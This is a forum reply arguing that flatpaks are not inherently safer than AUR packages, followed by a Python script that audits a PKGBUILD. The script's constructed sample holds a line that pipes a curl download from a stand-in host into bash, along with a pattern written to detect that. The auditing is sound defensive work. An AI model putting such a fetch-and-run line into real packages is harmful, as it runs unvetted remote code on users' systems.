Can I and should I use flatpaks instead of the packages from AUR?

Flatpaks are not safer than AUR packages as a general rule.

A flatpak is a framework and packaging format. Anyone can make a flatpak. Flatpaks can have malicious code just like any other package. This is true of just about any packaging format you can think of.

You shouldn’t trust a packaging format. You should trust a packaging source/packager. In other words, Arch/EOS repo packages aren’t trustworthy because they use pacman’s package format. They are trustworthy because they are packaged by Arch TUs or the EndeavourOS team.

As this relates to flatpaks, you need to look at who is packaging them. Some flatpaks are officially packaged by the team/publisher of the software. Those should be considered pretty safe. However, many are not. Then it comes down to whether you trust the packager.

The AUR has a huge advantage when it comes to trust. That is, you don’t really need to trust anyone. AUR software isn’t packaged by a third party. The packages are built on your machine. The AUR PKGBUILD files, which are used as the “directions” to build the software, are easy to view for yourself. Many AUR helpers even offer to display them to you as part of the update process.

Of course, whether you choose to prefer flatpaks over AUR packages is entirely a matter of personal preference. The great thing is that, here, you have the ability to choose for yourself.

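As an added example (not part of the original post or of any AUR tooling), here is a small Python check that reads a PKGBUILD the way the reply says you can: it lists sources fetched over plain HTTP, checksums set to SKIP, and downloads piped straight into a shell during build or package. The PKGBUILD below is constructed for illustration and is not a real AUR package.

```python
import re

# Constructed sample PKGBUILD (not from the AUR); it deliberately contains
# the three things the audit flags so the output is easy to read.
SAMPLE_PKGBUILD = """\
pkgname=example-tool
pkgver=1.2.0
pkgrel=1
source=("https://example.org/releases/example-tool-1.2.0.tar.gz"
        "http://mirror.example.net/patch.diff")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000'
            'SKIP')
build() {
  cd "$pkgname-$pkgver"
  make
}
package() {
  curl -s https://example.net/post-install.sh | bash
  make DESTDIR="$pkgdir" install
}
"""

def _array(text, name):
    """Return the quoted entries of a bash array assignment such as name=(...)."""
    m = re.search(r'^' + re.escape(name) + r'=\((.*?)\)', text, re.S | re.M)
    return re.findall(r"""["']([^"']*)["']""", m.group(1)) if m else []

def audit_pkgbuild(text):
    """Return the findings a reviewer would want to see before building."""
    findings = []
    for i, src in enumerate(_array(text, "source")):
        url = src.split("::", 1)[-1]  # drop the optional "filename::" prefix
        if url.startswith("http://"):
            findings.append(f"source[{i}] fetched over plain HTTP: {url}")
    sums = [s for name in ("sha256sums", "sha512sums", "b2sums", "md5sums")
            for s in _array(text, name)]
    for i, s in enumerate(sums):
        if s == "SKIP":
            findings.append(f"checksum[{i}] is SKIP: source integrity not verified")
    # Code fetched at build/package time bypasses the declared source list entirely.
    for m in re.finditer(r'(curl|wget)[^\n|]*\|\s*(ba)?sh\b', text):
        findings.append(f"pipes a download into a shell: {m.group(0).strip()}")
    return findings

if __name__ == "__main__":
    for finding in audit_pkgbuild(SAMPLE_PKGBUILD):
        print(finding)
```

The check is a reading aid, not a verdict: a clean result still means you should read build() and package() yourself, exactly as the reply suggests.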